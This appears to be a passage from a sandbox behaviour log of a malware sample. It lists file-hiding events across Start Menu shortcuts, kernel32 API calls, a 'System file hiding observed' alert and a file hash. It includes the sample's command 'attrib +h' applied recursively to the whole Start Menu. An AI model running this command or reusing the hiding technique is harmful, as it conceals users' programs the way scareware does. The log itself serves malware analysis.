Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Communications\Hype
   rTerminal.lnk
1632786
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Communications\Netw
   ork Connections.lnk
16321757
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Communications\Netw
   ork Setup Wizard.lnk
16321640
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Communications\New
   Connection Wizard.lnk
16321646
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Communications\Remo
   te Desktop Connection.lnk
16321503
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Communications\Wire
   less Network Setup Wizard.lnk
16321656
API Call
  API Name:  GetSystemDirectoryW   Address:  0x755dd30d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Entertainment\Sound
    Recorder.lnk
16321528
API Call
  API Name:  SetErrorMode   Address:  0x77f67d75
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Entertainment\Volum
   e Control.lnk
16321528
API Call
  API Name:  SetErrorMode   Address:  0x77f67d75
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\System Tools\Activa
   te Windows.lnk
16321599
API Call
  API Name:  SetErrorMode   Address:  0x7c821ce6
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\System Tools\Backup
   .lnk
16321532
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\System Tools\Charac
   ter Map.lnk
16321521
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\System Tools\Disk C
   leanup.lnk
16321532
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\System Tools\Disk D
   efragmenter.lnk
16321572
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\System Tools\Files
   and Settings Transfer Wizard.lnk
16321591
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\System Tools\Schedu
   led Tasks.lnk
16321753
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\System Tools\Securi
   ty Center.lnk
16321539
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\System Tools\System
    Information.lnk
16321070
API Call
  API Name:  Sleep   Address:  0x0040b688
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\System Tools\System
    Restore.lnk
16321616
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Accessibility
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Calculator.lnk
16321498
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Communications
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Entertainment
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Paint.lnk
16321515
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\System Tools
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\Windows Movie Maker
   .lnk
1632790
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories\WordPad.lnk
1632879
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Administrative Tools\Component
   Services.lnk
16321582
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Administrative Tools\Computer M
   anagement.lnk
16321602
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Administrative Tools\Data Sourc
   es (ODBC).lnk
16321596
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Administrative Tools\Event View
   er.lnk
16321592
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Administrative Tools\Local Secu
   rity Policy.lnk
16321590
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Administrative Tools\Performanc
   e.lnk
16321591
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Administrative Tools\Services.l
   nk
16321602
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\Extras\AutoItX\AutoIt
   X Help File.lnk
1632790
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\Extras\AutoItX\VBScri
   pt Examples.lnk
1632857
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\Extras\AutoIt v3 Webs
   ite.lnk
1632748
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\Extras\AutoItX
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\Extras\Browse Extras.
   lnk
1632667
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\AutoIt Help File.lnk
1632673
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\AutoIt Window Info.ln
   k
1632678
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\Check For Updates.lnk
1632818
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\Compile Script to .ex
   e.lnk
1632778
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\Examples.lnk
1632661
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\Extras
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\Run Script.lnk
1632678
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3\SciTE Script Editor.l
   nk
1632750
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Debugging Tools for Windows (x8
   6)\Debugging Help.lnk
1632871
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Debugging Tools for Windows (x8
   6)\Global Flags.lnk
1632859
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Debugging Tools for Windows (x8
   6)\Release Notes.lnk
1632871
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Debugging Tools for Windows (x8
   6)\Uninstall Debugging Tools for Windows (x86).lnk
1632603
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Debugging Tools for Windows (x8
   6)\WinDbg.lnk
1632859
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games\Freecell.lnk
16321522
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games\Hearts.lnk
16321520
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games\Internet Backgammon.lnk
1632913
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games\Internet Checkers.lnk
1632913
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games\Internet Hearts.lnk
1632913
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games\Internet Reversi.lnk
1632913
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games\Internet Spades.lnk
1632913
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games\Minesweeper.lnk
16321515
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games\Pinball.lnk
1632885
API Call
  API Name:  Process32FirstW   Address:  0x0040116d
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games\Solitaire.lnk
16321491
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games\Spider Solitaire.lnk
16321502
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Tools\Digital Certificate for VBA Projects.lnk
16322022
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Tools\Microsoft Clip Organizer.lnk
16321988
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Tools\Microsoft Office 2003 Language Settings.lnk
16321902
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Tools\Microsoft Office 2003 Save My Settings Wizard.lnk
16321908
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Tools\Microsoft Office Application Recovery.lnk
16321876
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Tools\Microsoft Office Document Imaging.lnk
16322140
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Tools\Microsoft Office Document Scanning.lnk
16322142
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Tools\Microsoft Office Picture Manager.lnk
16321964
API Call
  API Name:  Sleep   Address:  0x774f2fcb
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Excel 2003.lnk
16322044
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Outlook 2003.lnk
16322060
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce PowerPoint 2003.lnk
16322016
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Tools
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office\Microsoft Offi
   ce Word 2003.lnk
16322036
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Mozilla Firefox\Mozilla Firefox
    (Safe Mode).lnk
16321636
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Mozilla Firefox\Mozilla Firefox
   .lnk
16321614
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\QuickTime\About QuickTime.lnk
1632692
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\QuickTime\PictureViewer.lnk
16321624
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\QuickTime\QuickTime Player.lnk
16321638
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\QuickTime\Uninstall QuickTime.l
   nk
16322044
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Real\RealPlayer\Check for RealP
   layer Update.lnk
1632695
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Real\RealPlayer\RealPlayer Help
   .url
163275
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Real\RealPlayer\RealPlayer Lice
   nse Agreement.lnk
1632679
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Real\RealPlayer\RealPlayer Read
   Me.url
163286
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Real\RealPlayer\RealPlayer Subs
   cription.lnk
1632851
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Real\RealPlayer\RealPlayer.lnk
1632733
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Real\RealPlayer\Uninstall RealP
   layer.lnk
1632940
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Real\RealPlayer
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Startup\Adobe Reader Speed Laun
   ch.lnk
16321746
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Startup\Adobe Reader Synchroniz
   er.lnk
16321788
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Accessories
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Administrative Tools
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Adobe Reader 8.lnk
16321804
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\AutoIt v3
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Debugging Tools for Windows (x8
   6)
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Games
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Microsoft Office
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Mozilla Firefox
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\MSN Explorer.lnk
16321844
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\QuickTime
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Real
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\RealPlayer.lnk
1632721
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Startup
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs\Windows Messenger.lnk
1632785
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Programs
1632
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Set Program Access and Defaults.lnk
16321563
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Windows Catalog.lnk
1632398
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1\Windows Update.lnk
16321507
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\2\Launch Internet Explorer Browser.lnk
1632815
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\2\Launch Microsoft Office Outlook.lnk
1632792
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\2\Mozilla Firefox.lnk
16321620
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\2\QuickTime Player.lnk
16321644
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\2\Show Desktop.scf
163279
File
Hide

Target:      C:\Documents and Settings\admin\Local Settings\Temp\smtmp\2\Windows Media Player.lnk
1632804
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\1
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp\2
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x0404.ini
16323787
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x0406.ini
16325745
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x0407.ini
16326285
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x0409.ini
16325515
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x040a.ini
16326287
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x040b.ini
16325606
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x040c.ini
16326419
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x0410.ini
16326180
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x0411.ini
16325909
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x0412.ini
16325065
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x0413.ini
16326109
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x0414.ini
16325714
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x041d.ini
16325505
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\0x0804.ini
16323858
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\1033.MST
1632578048
Process
Started
C:\WINDOWS\system32\attrib.exe
  Parentname:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe
  Command Line:  attrib +h "C:\Documents and Settings\All Users\Start Menu\*.*" /s /d
3521436
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\ISScript11.Msi
1632982016
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\QuickTime.msi
163225888256
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\Setup.INI
16321964
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1\_ISMSIDEL.INI
16321099
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\14fb2.mst
1632578048
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\ASPNETSetup_00000.log
16324562
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_depcheckdotnetfx30.txt
1632189516
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_dotnetfx3install.txt
163290098
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_msxml_retMSI02B5.txt
1632377108
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_netfx_retMSI02E0.txt
16324660860
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_rgb_retMSI02B2.txt
1632134638
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_vcredistMSI0B38.txt
1632513998
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_vcredistUI0B38.txt
163211434
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_wcf_retCA2FBE.txt
16325086
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_wcf_retMSI03B4.txt
1632773074
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_WF_3.0_x86retMSI0549.txt
1632240136
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_WIC.txt
16325206
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_wpf_retMSI03C4.txt
1632742906
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\dd_XPS.txt
16323986
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\eG8kqEFi.pdf.part
163217286
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\hsperfdata_admin
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\java_install.log
163229093
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\java_install_reg.log
16322528
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\jusched.log
1632377
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\Microsoft Office 2003 Setup(0001).txt
163210088
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\Microsoft Office 2003 Setup(0001)_Task(0001).txt
1632185086
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\offcln11.log
163237450
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\OHotfix
1632
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\outlook logging
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\QTInstallCode.log
1632449
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\qtplugin.log
16323810
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\QuickTimeInstaller.exe
163233286211
Malicious  Alert
Misc  Anomaly
Message:   System file hiding observed    Detail:   Malware hiding existing exe/dll/sys file   
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\RunTime.ini
1632543
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\Silverlight0.log
16321744
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\SilverlightMSI.log
1632416786
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\smtmp
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\uxeventlog.txt
16322682
File
Hide
C:\Documents and Settings\admin\Local Settings\Temp\UZ5uPYHL8nfdS6.exe.tmp
  MD5:  06565696755efedcbba1236fa2291a8d
  SHA1: 65c7e6c4950aa6c05e38318b132cd0855bb69985
1632328192
Folder
Hide
C:\Documents and Settings\admin\Local Settings\Temp\_is1
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\AntiPhishing\B3BB5BBA-E7D5-4
   0AB-A041-A5B1C0B26C8F.dat
163278924
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\25D1389
   91D2CF5FA1A5994BD1F57E[1].jpg
16326920
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\28[1].g
   if
16321020
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\61F056D
   14E3B1DF5E5CDEEF9ACD32[1].jpg
16329101
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\8053325
   0A254877B56CEC7A3E11814[1].jpg
16327812
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\adchoic
   es_gif2[1].gif
1632417
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\ADSAdCl
   ient31[1].htm
16322269
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\BING_we
   bsearch_2[1].jpg
16324082
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\CADMFJL
   I
163246585
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\cc36ca6
   9630adc1a2052edc7351a47[1].gif
1632172
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\CFD4C7A
   3DEC612B8970E4CECB2730[1].jpg
163210494
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\en[1].j
   s
163211920
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\F546EEE
   D371C545A636442BA2F5A[1].jpg
16328996
API Call
  API Name:  Sleep   Address:  0x0040120c
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\jquery-
   1.4.2.min[1].js
163272182
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\sck[1].
   htm
16322489
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\shared[
   1].js
163272294
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\93EJ8ZXT\Uabrand
   [1].gif
16321525
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\111228_
   UTV_Lockin_25_HD_300x250[1].jpg
163226142
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\16ACFBE
   979249C5A2B33CF31BD97F[1].jpg
16328056
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\63dedd9
   603afc397923c5f9acda0e8[1].gif
16329256
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\73C3D77
   61EFD8E8F45593AA435A5C[1].jpg
163223065
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\7A5D9D8
   617C37E906519E9AC7597[1].jpg
16327015
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\7F1F48F
   B1DF076546AEAE4A289818[1].jpg
16327993
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\9654C52
   CBBD87D20FBBB2C81E4E44[1].jpg
16323931
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\A644C68
   FE0C782F9685C86683E3B6[1].jpg
16326886
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\ADSAdCl
   ient31[1].htm
16322443
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\alttext
   [1].xml
16321994
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\B72D63B
   99781477B320F154B41C[1].jpg
16325005
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\C4A3B49
   CC6B6506FD6D7193A4411[1].jpg
16323382
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\CA184JL
   9.HTM
1632
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\clock[1
   ]
16321177
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\dapmsn[
   1].js
16323842
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\J3ZDQMA1\qsonhs[
   1].aspx
163235
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\37BA92E
   210D341BFDBF4126422A3D2[1].gif
1632657
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\3BAAF1D
   5F446B668C7FC8CFAE0979F[1].jpg
16324208
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\4BD88A5
   1585C67154F1B1E1AA0D6[1].jpg
16328168
API Call
  API Name:  WaitForSingleObject   Address:  0x7473d232
  Imagepath:  C:\Documents and Settings\All Users\Application Data\WqOvLTCdmDgTIK.exe   DLL Name:  kernel32
1436
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\4FD0E52
   BA6B72CC7965AD89E843835[1].jpg
16323424
File
Hide
C:\Documents and Settings\admin\Local Settings\Temporary Internet Files\Content.IE5\KNOKM7UC\5280118
